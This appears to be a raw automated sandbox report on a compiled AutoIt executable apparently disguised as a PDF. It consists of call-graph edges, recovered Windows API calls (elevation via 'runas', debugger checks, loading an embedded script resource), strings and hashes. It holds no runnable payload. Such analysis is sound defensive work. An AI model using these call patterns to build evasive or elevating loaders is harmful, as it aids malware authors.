100398->100402 100401 b4d33d 100399->100401 100404 ae9997 84 API calls 100401->100404 100403 b4d457 100402->100403 100405 ae5956 67 API calls 100403->100405 100406 b4d349 100404->100406 100407 b4d466 100405->100407 100408 ae46f9 59 API calls 100406->100408 100409 b4d49e 100407->100409 100410 b4d46a GetLastError 100407->100410 100411 b4d35e 100408->100411 100414 b4d500 100409->100414 100415 b4d4c9 100409->100415 100413 b4d483 100410->100413 100412 ae7c8e 59 API calls 100411->100412 100416 b4d391 100412->100416 100413->100434 100541 ae5a1a CloseHandle 100413->100541 100419 b00ff6 Mailbox 59 API calls 100414->100419 100417 b00ff6 Mailbox 59 API calls 100415->100417 100418 b4d3e3 100416->100418 100422 b43e73 3 API calls 100416->100422 100421 b4d4ce 100417->100421 100420 ae9c9c 59 API calls 100418->100420 100424 b4d505 100419->100424 100420->100393 100426 ae77c7 59 API calls 100421->100426 100428 b4d4df 100421->100428 100425 b4d3a1 100422->100425 100429 ae77c7 59 API calls 100424->100429 100424->100434 100425->100418 100427 b4d3a5 100425->100427 100426->100428 100430 ae7f41 59 API calls 100427->100430 100542 b4f835 59 API calls 2 library calls 100428->100542 100429->100434 100432 b4d3b2 100430->100432 100539 b43c66 63 API calls Mailbox 100432->100539 100434->100378 100435 b4d3bb Mailbox 100435->100418 100543 b5cdf1 100436->100543 100438 b5e247 100438->100378 100633 b3f8f2 100439->100633 100441 b62529 100652 ae9b9c 59 API calls Mailbox 100441->100652 100443 b62545 Mailbox 100443->100378 100445 b4d305 100444->100445 100446 b4d310 100444->100446 100447 ae9c9c 59 API calls 100445->100447 100448 b4d3ea Mailbox 100446->100448 100450 ae77c7 59 API calls 100446->100450 100447->100446 100449 b00ff6 Mailbox 59 API calls 100448->100449 100488 b4d3f3 Mailbox 100448->100488 100451 b4d433 100449->100451 100452 b4d334 100450->100452 100453 b4d43f 100451->100453 100655 ae5906 60 API calls Mailbox 100451->100655 100454 ae77c7 59 API calls 100452->100454 100457 ae9997 84 API calls 
100453->100457 100456 b4d33d 100454->100456 100459 ae9997 84 API calls 100456->100459 100458 b4d457 100457->100458 100460 ae5956 67 API calls 100458->100460 100461 b4d349 100459->100461 100462 b4d466 100460->100462 100463 ae46f9 59 API calls 100461->100463 100464 b4d49e 100462->100464 100465 b4d46a GetLastError 100462->100465 100466 b4d35e 100463->100466 100469 b4d500 100464->100469 100470 b4d4c9 100464->100470 100468 b4d483 100465->100468 100467 ae7c8e 59 API calls 100466->100467 100471 b4d391 100467->100471 100468->100488 100656 ae5a1a CloseHandle 100468->100656 100474 b00ff6 Mailbox 59 API calls 100469->100474 100472 b00ff6 Mailbox 59 API calls 100470->100472 100473 b4d3e3 100471->100473 100477 b43e73 3 API calls 100471->100477 100476 b4d4ce 100472->100476 100475 ae9c9c 59 API calls 100473->100475 100479 b4d505 100474->100479 100475->100448 100480 b4d4df 100476->100480 100482 ae77c7 59 API calls 100476->100482 100481 b4d3a1 100477->100481 100484 ae77c7 59 API calls 100479->100484 100479->100488 100657 b4f835 59 API calls 2 library calls 100480->100657 100481->100473 100483 b4d3a5 100481->100483 100482->100480 100485 ae7f41 59 API calls 100483->100485 100484->100488 100487 b4d3b2 100485->100487 100654 b43c66 63 API calls Mailbox 100487->100654 100488->100378 100490 b4d3bb Mailbox 100490->100473 100492 ae9bf8 59 API calls 100491->100492 100493 af213b 100492->100493 100494 b00ff6 Mailbox 59 API calls 100493->100494 100498 b269af 100493->100498 100496 af2154 100494->100496 100499 af2164 100496->100499 100673 ae5906 60 API calls Mailbox 100496->100673 100497 af2189 100502 ae9c9c 59 API calls 100497->100502 100506 af2196 100497->100506 100498->100497 100677 b4f7df 59 API calls 100498->100677 100501 ae9997 84 API calls 100499->100501 100503 af2172 100501->100503 100504 b269f7 100502->100504 100505 ae5956 67 API calls 100503->100505 100504->100506 100507 b269ff 100504->100507 100508 af2181 100505->100508 100510 ae5e3f 2 API calls 100506->100510 100509 ae9c9c 59 API 
calls 100507->100509 100508->100497 100508->100498 100676 ae5a1a CloseHandle 100508->100676 100512 af219d 100509->100512 100510->100512 100513 b26a11 100512->100513 100514 af21b7 100512->100514 100516 b00ff6 Mailbox 59 API calls 100513->100516 100515 ae77c7 59 API calls 100514->100515 100517 af21bf 100515->100517 100518 b26a17 100516->100518 100658 ae56d2 100517->100658 100523 b26a2b 100518->100523 100678 ae59b0 ReadFile SetFilePointerEx 100518->100678 100521 af21ce 100525 b26a2f _memmove 100521->100525 100674 ae9b9c 59 API calls Mailbox 100521->100674 100523->100525 100679 b4794e 59 API calls 2 library calls 100523->100679 100526 af21e2 Mailbox 100527 af221c 100526->100527 100528 ae5dcf CloseHandle 100526->100528 100527->100378 100529 af2210 100528->100529 100529->100527 100675 ae5a1a CloseHandle 100529->100675 100532 b5cdf1 130 API calls 100531->100532 100533 b5e25b 100532->100533 100533->100378 100534->100378 100535->100374 100683 b36636 100536->100683 100538 b36702 100538->100376 100539->100435 100540->100398 100541->100434 100542->100434 100544 ae9997 84 API calls 100543->100544 100545 b5ce2e 100544->100545 100549 b5ce75 Mailbox 100545->100549 100581 b5dab9 100545->100581 100547 b5d242 100620 b5dbdc 92 API calls Mailbox 100547->100620 100549->100438 100551 b5d251 100552 b5d0db 100551->100552 100553 b5d25d 100551->100553 100594 b5cc82 100552->100594 100553->100549 100554 ae9997 84 API calls 100560 b5cec6 Mailbox 100554->100560 100559 b5d114 100609 b00e48 100559->100609 100560->100549 100560->100554 100568 b5d0cd 100560->100568 100613 b4f835 59 API calls 2 library calls 100560->100613 100614 b5d2f3 61 API calls 2 library calls 100560->100614 100563 b5d147 100566 ae942e 59 API calls 100563->100566 100564 b5d12e 100615 b4a0b5 89 API calls 4 library calls 100564->100615 100569 b5d153 100566->100569 100567 b5d139 GetCurrentProcess TerminateProcess 100567->100563 100568->100547 100568->100552 100570 ae91b0 59 API calls 100569->100570 100571 b5d169 100570->100571 
100580 b5d190 100571->100580 100616 ae8ea0 59 API calls Mailbox 100571->100616 100572 b5d2b8 100572->100549 100576 b5d2cc FreeLibrary 100572->100576 100574 b5d17f 100617 b5d95d 107 API calls _free 100574->100617 100576->100549 100580->100572 100618 ae8ea0 59 API calls Mailbox 100580->100618 100619 ae9e9c 60 API calls Mailbox 100580->100619 100621 b5d95d 107 API calls _free 100580->100621 100582 ae7faf 59 API calls 100581->100582 100583 b5dad4 CharLowerBuffW 100582->100583 100622 b3f658 100583->100622 100587 ae77c7 59 API calls 100588 b5db0d 100587->100588 100589 ae79ab 59 API calls 100588->100589 100590 b5db24 100589->100590 100591 ae7e8c 59 API calls 100590->100591 100592 b5db30 Mailbox 100591->100592 100593 b5db6c Mailbox 100592->100593 100629 b5d2f3 61 API calls 2 library calls 100592->100629 100593->100560 100595 b5cc9d 100594->100595 100599 b5ccf2 100594->100599 100596 b00ff6 Mailbox 59 API calls 100595->100596 100598 b5ccbf 100596->100598 100597 b00ff6 Mailbox 59 API calls 100597->100598 100598->100597 100598->100599 100600 b5dd64 100599->100600 100601 b5df8d Mailbox 100600->100601 100608 b5dd87 _strcat _wcscpy __wsetenvp 100600->100608 100601->100559 100602 ae9c9c 59 API calls 100602->100608 100603 ae9d46 59 API calls 100603->100608 100604 ae9cf8 59 API calls 100604->100608 100605 ae9997 84 API calls 100605->100608 100606 b0594c 58 API calls __malloc_crt 100606->100608 100608->100601 100608->100602 100608->100603 100608->100604 100608->100605 100608->100606 100632 b45b29 61 API calls 2 library calls 100608->100632 100611 b00e5d 100609->100611 100610 b00ef5 VirtualAlloc 100612 b00ec3 100610->100612 100611->100610 100611->100612 100612->100563 100612->100564 100613->100560 100614->100560 100615->100567 100616->100574 100617->100580 100618->100580 100619->100580 100620->100551 100621->100580 100623 b3f683 __wsetenvp 100622->100623 100624 b3f6c2 100623->100624 100627 b3f6b8 100623->100627 100628 b3f769 100623->100628 100624->100587 100624->100592 100627->100624 
100630 ae7a24 61 API calls 100627->100630 100628->100624 100631 ae7a24 61 API calls 100628->100631 100629->100593 100630->100627 100631->100628 100632->100608 100634 ae77c7 59 API calls 100633->100634 100635 b3f905 100634->100635 100636 ae7b76 59 API calls 100635->100636 100637 b3f919 100636->100637 100638 b3f658 61 API calls 100637->100638 100644 b3f93b 100637->100644 100639 b3f935 100638->100639 100641 ae79ab 59 API calls 100639->100641 100639->100644 100640 b3f658 61 API calls 100640->100644 100641->100644 100642 b3f9b5 100645 ae79ab 59 API calls 100642->100645 100643 ae79ab 59 API calls 100643->100644 100644->100640 100644->100642 100644->100643 100648 ae7c8e 59 API calls 100644->100648 100646 b3f9ce 100645->100646 100647 ae7c8e 59 API calls 100646->100647 100649 b3f9da 100647->100649 100648->100644 100651 b3f9e9 Mailbox 100649->100651 100653 ae80d7 59 API calls 2 library calls 100649->100653 100651->100441 100652->100443 100653->100651 100654->100490 100655->100453 100656->100488 100657->100488 100659 ae56dd 100658->100659 100660 ae5702 100658->100660 100659->100660 100664 ae56ec 100659->100664 100661 ae7eec 59 API calls 100660->100661 100665 b4349a 100661->100665 100662 b434c9 100662->100521 100666 ae5c18 59 API calls 100664->100666 100665->100662 100680 b43436 ReadFile SetFilePointerEx 100665->100680 100681 ae7a84 59 API calls 2 library calls 100665->100681 100667 b435ba 100666->100667 100669 ae5632 61 API calls 100667->100669 100670 b435c8 100669->100670 100672 b435d8 Mailbox 100670->100672 100682 ae793a 61 API calls Mailbox 100670->100682 100672->100521 100673->100499 100674->100526 100675->100527 100676->100498 100677->100498 100678->100523 100679->100525 100680->100665 100681->100665 100682->100672 100684 b36641 100683->100684 100685 b3665e 100683->100685 100684->100685 100687 b36621 59 API calls Mailbox 100684->100687 100685->100538 100687->100684 100688 1c523b0 100702 1c50000 100688->100702 100690 1c5243a 100705 1c522a0 100690->100705 100708 1c53460 
GetPEB 100702->100708 100704 1c5068b 100704->100690 100706 1c522a9 Sleep 100705->100706 100707 1c522b7 100706->100707 100709 1c5348a 100708->100709 100709->100704 100710 aee608 100713 aed260 100710->100713 100712 aee616 100714 aed27d 100713->100714 100731 aed4dd 100713->100731 100715 b22b0a 100714->100715 100716 b22abb 100714->100716 100732 aed2a4 100714->100732 100757 b5a6fb 331 API calls __cinit 100715->100757 100719 b22abe 100716->100719 100726 b22ad9 100716->100726 100720 b22aca 100719->100720 100719->100732 100755 b5ad0f 331 API calls 100720->100755 100722 b02f80 __cinit 67 API calls 100722->100732 100724 b22cdf 100724->100724 100725 aed6ab 100725->100712 100726->100731 100756 b5b1b7 331 API calls 3 library calls 100726->100756 100727 aed594 100749 ae8bb2 68 API calls 100727->100749 100731->100725 100762 b4a0b5 89 API calls 4 library calls 100731->100762 100732->100722 100732->100725 100732->100727 100732->100731 100734 b22c26 100732->100734 100738 ae8620 69 API calls 100732->100738 100744 aea000 331 API calls 100732->100744 100745 ae81a7 59 API calls 100732->100745 100747 ae88a0 68 API calls __cinit 100732->100747 100748 ae86a2 68 API calls 100732->100748 100750 ae859a 68 API calls 100732->100750 100751 aed0dc 331 API calls 100732->100751 100752 ae9f3a 59 API calls Mailbox 100732->100752 100753 aed060 89 API calls 100732->100753 100754 aecedd 331 API calls 100732->100754 100758 ae8bb2 68 API calls 100732->100758 100759 ae9e9c 60 API calls Mailbox 100732->100759 100760 b36d03 60 API calls 100732->100760 100733 aed5a3 100733->100712 100761 b5aa66 89 API calls 100734->100761 100738->100732 100744->100732 100745->100732 100747->100732 100748->100732 100749->100733 100750->100732 100751->100732 100752->100732 100753->100732 100754->100732 100755->100725 100756->100731 100757->100732 100758->100732 100759->100732 100760->100732 100761->100731 100762->100724 100763 b1ff06 100764 b1ff10 100763->100764 100804 aeac90 Mailbox _memmove 100763->100804 100864 ae8e34 59 API 
calls Mailbox 100764->100864 100766 b00ff6 59 API calls Mailbox 100766->100804 100772 aeb5d5 100775 ae81a7 59 API calls 100772->100775 100773 b00ff6 59 API calls Mailbox 100789 aea097 Mailbox 100773->100789 100774 ae81a7 59 API calls 100774->100789 100784 aea1b7 100775->100784 100776 b2047f 100868 b4a0b5 89 API calls 4 library calls 100776->100868 100777 aeb5da 100873 b4a0b5 89 API calls 4 library calls 100777->100873 100780 ae7f41 59 API calls 100780->100804 100781 ae77c7 59 API calls 100781->100789 100783 b2048e 100786 b02f80 67 API calls __cinit 100786->100789 100787 b37405 59 API calls 100787->100789 100788 b366f4 Mailbox 59 API calls 100788->100784 100789->100772 100789->100773 100789->100774 100789->100776 100789->100777 100789->100781 100789->100784 100789->100786 100789->100787 100790 b20e00 100789->100790 100793 aea6ba 100789->100793 100859 aeca20 331 API calls 2 library calls 100789->100859 100860 aeba60 60 API calls Mailbox 100789->100860 100872 b4a0b5 89 API calls 4 library calls 100790->100872 100792 b5bf80 331 API calls 100792->100804 100871 b4a0b5 89 API calls 4 library calls 100793->100871 100794 b366f4 Mailbox 59 API calls 100794->100804 100795 aeb416 100863 aef803 331 API calls 100795->100863 100797 aea000 331 API calls 100797->100804 100798 b20c94 100799 ae9df0 Mailbox 59 API calls 100798->100799 100802 b20c86 100799->100802 100800 b20ca2 100870 b4a0b5 89 API calls 4 library calls 100800->100870 100802->100784 100802->100788 100803 aeb37c 100861 ae9e9c 60 API calls Mailbox 100803->100861 100804->100766 100804->100780 100804->100784 100804->100789 100804->100792 100804->100794 100804->100795 100804->100797 100804->100798 100804->100800 100804->100803 100809 aeb685 100804->100809 100812 aeade2 Mailbox 100804->100812 100821 b5c5f4 100804->100821 100853 b47be0 100804->100853 100865 b37405 59 API calls 100804->100865 100866 b5c4a7 85 API calls 2 library calls 100804->100866 100806 aeb38d 100862 ae9e9c 60 API calls Mailbox 100806->100862 100869 b4a0b5 
89 API calls 4 library calls 100809->100869 100811 ae9df0 Mailbox 59 API calls 100811->100812 100812->100784 100812->100802 100812->100809 100812->100811 100813 b200e0 VariantClear 100812->100813 100814 b4d2e5 101 API calls 100812->100814 100815 b4d2e6 101 API calls 100812->100815 100816 b5e237 130 API calls 100812->100816 100817 b5474d 331 API calls 100812->100817 100818 b6251d 62 API calls 100812->100818 100819 af2123 95 API calls 100812->100819 100820 b5e24b 130 API calls 100812->100820 100867 b37405 59 API calls 100812->100867 100813->100812 100814->100812 100815->100812 100816->100812 100817->100812 100818->100812 100819->100812 100820->100812 100822 ae77c7 59 API calls 100821->100822 100823 b5c608 100822->100823 100824 ae77c7 59 API calls 100823->100824 100825 b5c610 100824->100825 100826 ae77c7 59 API calls 100825->100826 100827 b5c618 100826->100827 100828 ae9997 84 API calls 100827->100828 100840 b5c626 100828->100840 100829 ae7d2c 59 API calls 100829->100840 100830 b5c80f 100831 b5c83c Mailbox 100830->100831 100876 ae9b9c 59 API calls Mailbox 100830->100876 100831->100804 100833 b5c7f6 100835 ae7e0b 59 API calls 100833->100835 100834 b5c811 100839 ae7e0b 59 API calls 100834->100839 100838 b5c803 100835->100838 100836 ae7a84 59 API calls 100836->100840 100837 ae81a7 59 API calls 100837->100840 100842 ae7c8e 59 API calls 100838->100842 100843 b5c820 100839->100843 100840->100829 100840->100830 100840->100831 100840->100833 100840->100834 100840->100836 100840->100837 100841 ae7faf 59 API calls 100840->100841 100845 ae7faf 59 API calls 100840->100845 100850 ae9997 84 API calls 100840->100850 100851 ae7e0b 59 API calls 100840->100851 100852 ae7c8e 59 API calls 100840->100852 100846 b5c6bd CharUpperBuffW 100841->100846 100842->100830 100844 ae7c8e 59 API calls 100843->100844 100844->100830 100847 b5c77d CharUpperBuffW 100845->100847 100874 ae859a 68 API calls 100846->100874 100875 aec707 69 API calls 2 library calls 100847->100875 100850->100840 100851->100840 
100852->100840 100854 b47bec 100853->100854 100855 b00ff6 Mailbox 59 API calls 100854->100855 100856 b47bfa 100855->100856 100857 b47c08 100856->100857 100858 ae77c7 59 API calls 100856->100858 100857->100804 100858->100857 100859->100789 100860->100789 100861->100806 100862->100795 100863->100809 100864->100804 100865->100804 100866->100804 100867->100812 100868->100783 100869->100802 100870->100802 100871->100784 100872->100777 100873->100784 100874->100840 100875->100840 100876->100831 100877 ae1016 100882 ae4ad2 100877->100882 100880 b02f80 __cinit 67 API calls 100881 ae1025 100880->100881 100883 b00ff6 Mailbox 59 API calls 100882->100883 100884 ae4ada 100883->100884 100885 ae101b 100884->100885 100889 ae4a94 100884->100889 100885->100880 100890 ae4a9d 100889->100890 100891 ae4aaf 100889->100891 100892 b02f80 __cinit 67 API calls 100890->100892 100893 ae4afe 100891->100893 100892->100891 100894 ae77c7 59 API calls 100893->100894 100895 ae4b16 GetVersionExW 100894->100895 100896 ae7d2c 59 API calls 100895->100896 100897 ae4b59 100896->100897 100898 ae7e8c 59 API calls 100897->100898 100909 ae4b86 100897->100909 100899 ae4b7a 100898->100899 100900 ae7886 59 API calls 100899->100900 100900->100909 100901 ae4bf1 GetCurrentProcess IsWow64Process 100903 ae4c0a 100901->100903 100902 b1dc8d 100904 ae4c89 GetSystemInfo 100903->100904 100905 ae4c20 100903->100905 100906 ae4c56 100904->100906 100917 ae4c95 100905->100917 100906->100885 100909->100901 100909->100902 100910 ae4c7d GetSystemInfo 100913 ae4c47 100910->100913 100911 ae4c32 100912 ae4c95 2 API calls 100911->100912 100914 ae4c3a GetNativeSystemInfo 100912->100914 100913->100906 100915 ae4c4d FreeLibrary 100913->100915 100914->100913 100915->100906 100918 ae4c2e 100917->100918 100919 ae4c9e LoadLibraryA 100917->100919 100918->100910 100918->100911 100919->100918 100920 ae4caf GetProcAddress 100919->100920 100920->100918 100921 ae1066 100926 aef8cf 100921->100926 100923 ae106c 100924 b02f80 __cinit 67 API calls 
                                                                          • Control-flow graph (edge list of the interactive graph omitted); Win32 calls named on the graph: GetStdHandle, OleInitialize, CreateThread, CloseHandle, RegisterWindowMessageW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, PostQuitMessage, DefWindowProcW, SetTimer, KillTimer, CreatePopupMenu, MoveWindow, SetFocus, Shell_NotifyIconW, DeleteObject, DestroyWindow

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AE3B7A
                                                                          • IsDebuggerPresent.KERNEL32 ref: 00AE3B8C
                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00BA62F8,00BA62E0,?,?), ref: 00AE3BFD
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                            • Part of subcall function 00AF0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AE3C26,00BA62F8,?,?,?), ref: 00AF0ACE
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE3C81
                                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00B993F0,00000010), ref: 00B1D4BC
                                                                          • SetCurrentDirectoryW.KERNEL32(?,00BA62F8,?,?,?), ref: 00B1D4F4
                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B95D40,00BA62F8,?,?,?), ref: 00B1D57A
                                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00B1D581
                                                                            • Part of subcall function 00AE3A58: GetSysColorBrush.USER32(0000000F), ref: 00AE3A62
                                                                            • Part of subcall function 00AE3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00AE3A71
                                                                            • Part of subcall function 00AE3A58: LoadIconW.USER32(00000063), ref: 00AE3A88
                                                                            • Part of subcall function 00AE3A58: LoadIconW.USER32(000000A4), ref: 00AE3A9A
                                                                            • Part of subcall function 00AE3A58: LoadIconW.USER32(000000A2), ref: 00AE3AAC
                                                                            • Part of subcall function 00AE3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AE3AD2
                                                                            • Part of subcall function 00AE3A58: RegisterClassExW.USER32(?), ref: 00AE3B28
                                                                            • Part of subcall function 00AE39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AE3A15
                                                                            • Part of subcall function 00AE39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AE3A36
                                                                            • Part of subcall function 00AE39E7: ShowWindow.USER32(00000000,?,?), ref: 00AE3A4A
                                                                            • Part of subcall function 00AE39E7: ShowWindow.USER32(00000000,?,?), ref: 00AE3A53
                                                                            • Part of subcall function 00AE43DB: _memset.LIBCMT ref: 00AE4401
                                                                            • Part of subcall function 00AE43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AE44A6
                                                                          Strings
                                                                          • This is a third-party compiled AutoIt script., xrefs: 00B1D4B4
                                                                          • runas, xrefs: 00B1D575
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                          • String ID: This is a third-party compiled AutoIt script.$runas
                                                                          • API String ID: 529118366-3287110873
                                                                          • Opcode ID: ea2ad0385c8168e866aa82af180058f2d1bae37c512b3b6a7a7754a4b42edfdf
                                                                          • Instruction ID: fe877d00a576eb7d778dd24520ed0ba6763f577f24761c19c94a3c84fc78befa
                                                                          • Opcode Fuzzy Hash: ea2ad0385c8168e866aa82af180058f2d1bae37c512b3b6a7a7754a4b42edfdf
                                                                          • Instruction Fuzzy Hash: 62510A72908389AECF11EBB5DD1AEFD7BB8AF46300F1440B5F411631A1DE749A45CB21

                                                                          Control-flow Graph

                                                                          • Graph for the function at ae4afe (interactive edge list omitted); Win32 calls on the graph: GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary, GetSystemInfo
                                                                          APIs
                                                                          • GetVersionExW.KERNEL32(?), ref: 00AE4B2B
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                          • GetCurrentProcess.KERNEL32(?,00B6FAEC,00000000,00000000,?), ref: 00AE4BF8
                                                                          • IsWow64Process.KERNEL32(00000000), ref: 00AE4BFF
                                                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00AE4C45
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00AE4C50
                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00AE4C81
                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00AE4C8D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                          • String ID:
                                                                          • API String ID: 1986165174-0
                                                                          • Opcode ID: 2c644495badf0b6f69a1e29bc716d345d43cc11f38f3fb946d89eb621b1abf40
                                                                          • Instruction ID: b306ceb8a456f2545113f96d30abebfb87744dd9b294227a45e6c6009b05bc68
                                                                          • Opcode Fuzzy Hash: 2c644495badf0b6f69a1e29bc716d345d43cc11f38f3fb946d89eb621b1abf40
                                                                          • Instruction Fuzzy Hash: A091E43154A7C0DEC731CB7995512ABBFF8AF6A300B584D9DE0CB93A41D224F948C759

                                                                          Control-flow Graph

                                                                          • Graph for the function at ae4fe9 (interactive edge list omitted); Win32 calls on the graph: CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource
                                                                          APIs
                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00AE4EEE,?,?,00000000,00000000), ref: 00AE4FF9
                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AE4EEE,?,?,00000000,00000000), ref: 00AE5010
                                                                          • LoadResource.KERNEL32(?,00000000,?,?,00AE4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AE4F8F), ref: 00B1DD60
                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00AE4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AE4F8F), ref: 00B1DD75
                                                                          • LockResource.KERNEL32(00AE4EEE,?,?,00AE4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AE4F8F,00000000), ref: 00B1DD88
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                          • String ID: SCRIPT
                                                                          • API String ID: 3051347437-3967369404
                                                                          • Opcode ID: 4d3c3d6e8abcd4fc1cc4606575e152cafafc8e942378317c62246e35f926808c
                                                                          • Instruction ID: 1efaeaaa9df4c95c93e5424176e2a3b6a69304650ede566c6bdc95acc81d3eb9
                                                                          • Opcode Fuzzy Hash: 4d3c3d6e8abcd4fc1cc4606575e152cafafc8e942378317c62246e35f926808c
                                                                          • Instruction Fuzzy Hash: AF112A75640741AFD7218B6AEC58F677BB9EBC9B55F204168F406D72A0DBA1E8008A60
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?,00B1E7C1), ref: 00B446A6
                                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00B446B7
                                                                          • FindClose.KERNEL32(00000000), ref: 00B446C7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                          • String ID:
                                                                          • API String ID: 48322524-0
                                                                          • Opcode ID: f33717810903b23ccd47e840271e9ba916cad8a3058e91a0aad01bad859b0e32
                                                                          • Instruction ID: a01893eca31fd70ba8f763629df25bb15301c148dc095277eeaa4f43e180b94d
                                                                          • Opcode Fuzzy Hash: f33717810903b23ccd47e840271e9ba916cad8a3058e91a0aad01bad859b0e32
                                                                          • Instruction Fuzzy Hash: 02E0D8314104015B42106B38FC4D4FA779CDE06335F100796F835C21E0EBF45A60A999
                                                                          Strings
                                                                          • Variable must be of type 'Object'., xrefs: 00B2428C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
